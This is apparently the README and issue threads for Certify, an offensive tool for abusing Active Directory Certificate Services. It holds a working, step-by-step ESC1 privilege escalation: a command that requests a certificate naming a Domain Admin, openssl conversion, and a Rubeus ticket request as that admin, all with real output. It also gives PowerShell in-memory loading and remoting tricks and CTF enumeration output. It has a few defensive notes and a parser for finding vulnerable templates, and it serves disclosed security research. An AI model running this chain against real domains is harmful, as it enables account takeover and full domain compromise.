Certify

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

@harmj0y and @tifkin_ are the primary authors of Certify and the associated AD CS research (blog and whitepaper).

Usage

C:\Tools>Certify.exe

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0


  Find information about all registered CAs:

    Certify.exe cas [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/hideAdmins] [/showAllPermissions] [/skipWebServiceChecks] [/quiet]


  Find all enabled certificate templates:

    Certify.exe find [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find vulnerable/abusable certificate templates using default low-privileged groups:

    Certify.exe find /vulnerable [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find vulnerable/abusable certificate templates using all groups the current user context is a part of:

    Certify.exe find /vulnerable /currentuser [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled:

    Certify.exe find /enrolleeSuppliesSubject [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find enabled certificate templates capable of client authentication:

    Certify.exe find /clientauth [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find all enabled certificate templates, display all of their permissions, and don't display the banner message:

    Certify.exe find /showAllPermissions /quiet [/ca:COMPUTER\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]

  Find all enabled certificate templates and output to a json file:

    Certify.exe find /json /outfile:C:\Temp\out.json [/ca:COMPUTER\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]


  Enumerate access control information for PKI objects:

    Certify.exe pkiobjects [/domain:domain.local] [/showAdmins] [/quiet]


  Request a new certificate using the current user context:

    Certify.exe request /ca:SERVER\ca-name [/subject:X] [/template:Y] [/install]

  Request a new certificate using the current machine context:

    Certify.exe request /ca:SERVER\ca-name /machine [/subject:X] [/template:Y] [/install]

  Request a new certificate using the current user context but for an alternate name (if supported):

    Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER

  Request a new certificate on behalf of another user, using an enrollment agent certificate:

    Certify.exe request /ca:SERVER\ca-name /template:Y /onbehalfof:DOMAIN\USER /enrollcert:C:\Temp\enroll.pfx [/enrollcertpw:CERT_PASSWORD]


  Download an already requested certificate:

    Certify.exe download /ca:SERVER\ca-name /id:X [/install] [/machine]



Certify completed in 00:00:00.0200190

Using Requested Certificates

Certificates can be transformed to .pfx files usable with Rubeus with the following command (cert.pem must contain both the private key and the certificate, exactly as Certify prints them):

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

With OpenSSL 3.x, if Windows refuses to import the resulting .pfx, re-run the export with the -legacy option so the file uses the older PKCS#12 algorithms that Windows expects.

Certificates can be used with Rubeus to request a TGT with:

Rubeus.exe asktgt /user:X /certificate:C:\Temp\cert.pfx /password:<CERT_PASSWORD>

Example Walkthrough

First, use Certify.exe to see if there are any vulnerable templates:

C:\Temp>Certify.exe find /vulnerable
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=theshire,DC=local'
[*] Restricting to CA name : dc.theshire.local\theshire-DC-CA

[*] Listing info about the Enterprise CA 'theshire-DC-CA'

    Enterprise CA Name            : theshire-DC-CA
    DNS Hostname                  : dc.theshire.local
    FullName                      : dc.theshire.local\theshire-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=theshire-DC-CA, DC=theshire, DC=local
    Cert Thumbprint               : 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
    Cert Serial                   : 14BFC25F2B6EEDA94404D5A5B0F33E21
    Cert Start Date               : 1/4/2021 10:48:02 AM
    Cert End Date                 : 1/4/2026 10:58:02 AM
    Cert Chain                    : CN=theshire-DC-CA,DC=theshire,DC=local
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
      Allow  ManageCA, Read, Enroll                     THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        [!] Low-privileged principal has ManageCA rights!
      Allow  Enroll                                     THESHIRE\Domain Computers     S-1-5-21-937929760-3187473010-80948926-515
      Allow  ManageCA, ManageCertificates               THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
      Allow  ManageCertificates, Enroll                 THESHIRE\certmanager          S-1-5-21-937929760-3187473010-80948926-1605
      Allow  ManageCA, Enroll                           THESHIRE\certadmin            S-1-5-21-937929760-3187473010-80948926-1606
    Enrollment Agent Restrictions :
      Everyone                      S-1-1-0
        Template : <All>
        Targets  :
          Everyone                  S-1-1-0

      Everyone                      S-1-1-0
        Template : User
        Targets  :
          Everyone                  S-1-1-0

Vulnerable Certificates Templates :

    CA Name                         : dc.theshire.local\theshire-DC-CA
    Template Name                   : User2
    Validity Period                 : 2 years
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        All Extended Rights         : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
      Object Control Permissions
        Owner                       : THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        Full Control Principals     : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        WriteOwner Principals       : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        WriteDacl Principals        : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        WriteProperty Principals    : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519

    CA Name                         : dc.theshire.local\theshire-DC-CA
    Template Name                   : VulnTemplate
    Validity Period                 : 3 years
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
      Object Control Permissions
        Owner                       : THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteOwner Principals       : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteDacl Principals        : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteProperty Principals    : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000



Certify completed in 00:00:00.6548319

Given the above results, we have the following three issues:

  1. THESHIRE\Domain Users have ManageCA permissions over the dc.theshire.local\theshire-DC-CA CA (ESC7)
    • This means that any domain user can flip the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA (the change takes effect once the CA service is restarted), after which any template the user can enroll in that allows client authentication can be abused to obtain a certificate for an arbitrary SAN.
  2. THESHIRE\Domain Users have full control over the User2 template (ESC4)
    • This means that any domain user can set the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag on this template and remove the PEND_ALL_REQUESTS (manager approval) issuance requirement, turning it into an ESC1 template.
  3. THESHIRE\Domain Users can enroll in the VulnTemplate template, which can be used for client authentication and has ENROLLEE_SUPPLIES_SUBJECT set (ESC1)
    • This allows any domain user to enroll in this template and specify an arbitrary Subject Alternative Name (e.g. the UPN of a Domain Admin), then authenticate as that account.
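The same three checks can be applied to a saved Certify report without reading it by hand. The following Python script is an added example written for this page (it is not part of Certify): it parses the plain-text format that Certify.exe find prints, as shown above, and flags ESC7 (a low-privileged principal with ManageCA or ManageCertificates on the CA), ESC4 (a low-privileged principal with control rights over a template object) and ESC1 (low-privileged enrollment in an ENROLLEE_SUPPLIES_SUBJECT template with an authentication EKU, no manager approval and no enrollment-agent signature). The set of "low-privileged" principals, the rule that a template with no EKU at all counts as authentication-capable, and the sample input (a trimmed copy of the walkthrough output above) are assumptions made for the example.

```python
"""Triage Certify 'find' text output for ESC1, ESC4 and ESC7 (added example, not Certify's code)."""
import re

LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # assumed low-priv: Everyone, Auth Users, Users
LOW_PRIV_RIDS = {"513", "515"}                           # assumed low-priv RIDs: Domain Users/Computers
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}
ENROLL_KEYS = {"Enrollment Rights", "All Extended Rights"}
CONTROL_KEYS = {"Owner", "Full Control Principals", "WriteOwner Principals",
                "WriteDacl Principals", "WriteProperty Principals"}
# Certify may glue the SID onto a long name ("...Authenticated UsersS-1-5-11"), hence the lazy name.
PRINCIPAL_RE = re.compile(r"^(?P<name>.*?)\s*(?P<sid>S-1-[0-9-]+)\s*$")
KEYVAL_RE = re.compile(r"^(?P<key>[^:]+?)\s*:\s*(?P<val>.*)$")
ACE_RE = re.compile(r"^(?P<type>Allow|Deny)\s+(?P<rights>\S.*?)\s{2,}(?P<rest>\S.*)$")

def is_low_priv(sid):
    return sid in LOW_PRIV_SIDS or (sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS)

def principal(text):
    return (m["name"].strip(), m["sid"]) if (m := PRINCIPAL_RE.match(text)) else None

def csv_set(value):
    return {v.strip() for v in value.split(",") if v.strip()}

def parse_certify_find(output):
    """Return (ca_acl, templates): ACEs as (type, rights, name, sid) tuples, templates as dicts."""
    ca_acl, templates, in_ca_acl, tmpl, plist = [], [], False, None, None
    for line in (raw.strip() for raw in output.splitlines()):
        if in_ca_acl and (ace := ACE_RE.match(line)) and (who := principal(ace["rest"])):
            ca_acl.append((ace["type"], csv_set(ace["rights"])) + who)
        elif kv := KEYVAL_RE.match(line):
            key, val, plist = kv["key"].strip(), kv["val"].strip(), None
            if key in ("CA Permissions", "Enrollment Agent Restrictions"):
                in_ca_acl = key == "CA Permissions"
            elif key == "CA Name":                  # every template block starts with CA Name
                in_ca_acl, tmpl = False, {"principals": {}, "ca name": val}
                templates.append(tmpl)
            elif tmpl is not None and key in ENROLL_KEYS | CONTROL_KEYS:
                plist = tmpl["principals"].setdefault(key, [])
                if who := principal(val):
                    plist.append(who)
            elif tmpl is not None:
                tmpl[key.lower()] = val             # e.g. "pkiextendedkeyusage"
        elif plist is not None and (who := principal(line)):
            plist.append(who)                       # continuation line of a principal list
        else:
            plist = None
    return ca_acl, templates

def field_set(tmpl, needle):
    # v1.0 prints msPKI-Certificates-Name-Flag, v1.1 msPKI-Certificate-Name-Flag: match loosely.
    return next((csv_set(v) for k, v in tmpl.items() if needle in k), set())

def check_esc7(ca_acl):
    """ESC7: low-priv principal allowed ManageCA or ManageCertificates on the CA (Deny ACEs ignored)."""
    return sorted({n for t, rights, n, s in ca_acl
                   if t == "Allow" and is_low_priv(s) and rights & {"ManageCA", "ManageCertificates"}})

def check_esc1(tmpl):
    """ESC1: low-priv enrollment, enrollee-supplied subject, auth EKU, no approval, no signatures."""
    enrollers = [p for k in ENROLL_KEYS for p in tmpl["principals"].get(k, [])]
    ekus = field_set(tmpl, "pkiextendedkeyusage")
    return (any(is_low_priv(s) for _, s in enrollers)
            and "ENROLLEE_SUPPLIES_SUBJECT" in field_set(tmpl, "name-flag")
            and (not ekus or bool(ekus & AUTH_EKUS))   # no EKU at all = "any purpose" (assumption)
            and "PEND_ALL_REQUESTS" not in field_set(tmpl, "enrollment-flag")
            and int(tmpl.get("authorized signatures required", "0")) == 0)

def check_esc4(tmpl):
    """ESC4: low-priv principals that own or can rewrite the template object."""
    return sorted({n for k in CONTROL_KEYS for n, s in tmpl["principals"].get(k, []) if is_low_priv(s)})

def triage(output):
    ca_acl, templates = parse_certify_find(output)
    return {"ESC7": check_esc7(ca_acl),
            "ESC1": [t["template name"] for t in templates if check_esc1(t)],
            "ESC4": {t["template name"]: check_esc4(t) for t in templates if check_esc4(t)}}

# Constructed input: a trimmed copy of the walkthrough output shown above.
SAMPLE = r"""
    CA Permissions                :
      Allow  ManageCA, Read, Enroll                     THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
      Allow  Enroll                                     THESHIRE\Domain Computers     S-1-5-21-937929760-3187473010-80948926-515
    CA Name                         : dc.theshire.local\theshire-DC-CA
    Template Name                   : User2
    msPKI-Certificates-Name-Flag    : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Smart Card Logon
        Full Control Principals     : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        WriteDacl Principals        : NT AUTHORITY\Authenticated UsersS-1-5-11
    CA Name                         : dc.theshire.local\theshire-DC-CA
    Template Name                   : VulnTemplate
    msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Encrypting File System, Secure Email
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
"""
```

To use it on a real report, save one with Certify.exe find /outfile:C:\Temp\find.txt, read the file and pass its text to triage(); on the sample above it returns ESC7 for THESHIRE\Domain Users, ESC1 for VulnTemplate and ESC4 for User2 (Domain Users and Authenticated Users). It ignores Deny ACEs and only sees the principals Certify prints, so treat it as triage rather than an authoritative ACL evaluation; Certify's own find /vulnerable makes the same decisions with the tool's knowledge of group membership.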

We'll show the abuse of scenario 3.

Next, let's request a new certificate for this template/CA, specifying the Domain Admin account localadmin as the alternate name (SAN):

C:\Temp>Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : THESHIRE\harmj0y
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate
[*] Subject                 : CN=harmj0y, OU=TestOU, DC=theshire, DC=local
[*] AltName                 : localadmin

[*] Certificate Authority   : dc.theshire.local\theshire-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 337

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAn8bKuwCYj8...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGITCCBQmgAwIBAgITVQAAAV...
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:04.2127911

Copy the block from -----BEGIN RSA PRIVATE KEY----- through -----END CERTIFICATE----- into a file named cert.pem on Linux/macOS, and run the openssl command to convert it to a .pfx. When prompted for an export password, press Enter to leave it empty (the Rubeus command below therefore needs no /password argument):

(base) laptop:~ harmj0y$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
(base) laptop:~ harmj0y$

Finally, move cert.pfx to the target machine's filesystem (manually or through Cobalt Strike), and request a TGT for the altname user with Rubeus. The private key in the .pfx proves possession of a certificate whose SAN names localadmin, so the KDC accepts the PKINIT pre-authentication and issues a TGT for that account:

C:\Temp>Rubeus.exe asktgt /user:localadmin /certificate:C:\Temp\cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=harmj0y, OU=TestOU, DC=theshire, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'theshire.local\localadmin'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFujCCBbagAwIBBaEDAgEWooIExzCC...(snip)...

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  localadmin
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  2/22/2021 2:06:51 PM
  EndTime               :  2/22/2021 3:06:51 PM
  RenewTill             :  3/1/2021 2:06:51 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  Etb5WPFWeMbsZr2+FQQQMw==

Defensive Considerations

Certify was released at Black Hat 2021 with our "Certified Pre-Owned: Abusing Active Directory Certificate Services" talk.

The TypeRefHash of the current Certify codebase is f9dbbfe2527e1164319350c0b0900c58be57a46c53ffef31699ed116a765995a.

The TypeLib GUID of Certify is 64524ca5-e4d0-41b3-acc3-3bdbefd40c97. This is reflected in the Yara rules currently in this repo.

See our whitepaper for prevention and detection guidance.

Compile Instructions

We are not planning on releasing binaries for Certify, so you will have to compile yourself :)

Certify has been built against .NET 4.0 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build.

Sidenote: Running Certify Through PowerShell

If you want to run Certify in-memory through a PowerShell wrapper, first compile Certify and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

[Certify.Program]::Main("find /vulnerable".Split())

Sidenote Sidenote: Running Certify Over PSRemoting

Due to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, Certify has a function to help with that.

If you follow the instructions in Sidenote: Running Certify Through PowerShell to create a Certify.ps1, append something like the following to the script:

[Certify.Program]::MainString("find /vulnerable")

You should then be able to run Certify over PSRemoting with something like the following:

$s = New-PSSession dc.theshire.local
Invoke-Command -Session $s -FilePath C:\Temp\Certify.ps1

Alternatively, Certify's /outfile:C:\FILE.txt argument will redirect all output streams to the specified file.

Reflections

On the subject of public disclosure, we self-embargoed the release of our offensive tooling (Certify as well as ForgeCert) for ~45 days after we published our whitepaper in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. We also preemptively released some Yara rules/IOCs for both projects and released the defensive-focused PSPKIAudit PowerShell project along with the whitepaper. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept.

Acknowledgments

Certify used a few resources found online as reference and inspiration:

The AD CS work was built on work from a number of others. The whitepaper has a complete treatment, but to summarize:

Contributors

bchurchill, ccob, daem0nc0re, harmj0y, leechristensen, ll1a4x, luemmelsec, michiellemmens, saerxcit

Issues

Crashing on Windows server 2019

Hi,

When trying to request a certificate on a Windows Server 2019 machine, I get the following:

[screenshot of the error, not reproduced here]

I get this when running it as system on the machine.

Vulnarable works but vulnerable doesn't?

The information below is from a CTF, so none of it is sensitive, but I recently noticed that using

certify.exe find /vulnerable

does not work; it says "no vulnerable certificates templates found!"

But if I try with the incorrect spelling

certify.exe find /vulnarable

It finds vulnerable templates without issue. It's a bit confusing because "vulnarable" is not the correct spelling of the word, but for now using find /abusable also works.

Evil-WinRM PS C:\Users\Raven\AppData\Local\Temp> ./certify.exe find /vulnerable


   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

Enterprise CA Name            : manager-DC01-CA
DNS Hostname                  : dc01.manager.htb
FullName                      : dc01.manager.htb\manager-DC01-CA
Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName              : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint               : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial                   : 5150CE6EC048749448C7390A52F264BB
Cert Start Date               : 7/27/2023 3:21:05 AM
Cert End Date                 : 7/27/2122 3:31:04 AM
Cert Chain                    : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN              : Disabled
CA Permissions                :
  Owner: BUILTIN\Administrators        S-1-5-32-544

  Access Rights                                     Principal

  Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
  Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
  Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
  Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
  Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
  Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!

Certify completed in 00:00:07.0877306
Evil-WinRM PS C:\Users\Raven\AppData\Local\Temp> ./certify.exe find /vulnarable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

Enterprise CA Name            : manager-DC01-CA
DNS Hostname                  : dc01.manager.htb
FullName                      : dc01.manager.htb\manager-DC01-CA
Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName              : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint               : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial                   : 5150CE6EC048749448C7390A52F264BB
Cert Start Date               : 7/27/2023 3:21:05 AM
Cert End Date                 : 7/27/2122 3:31:04 AM
Cert Chain                    : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN              : Disabled
CA Permissions                :
  Owner: BUILTIN\Administrators        S-1-5-32-544

  Access Rights                                     Principal

  Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
  Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
  Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
  Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
  Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
  Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : User
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : EFS
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Encrypting File System
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : Administrator
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
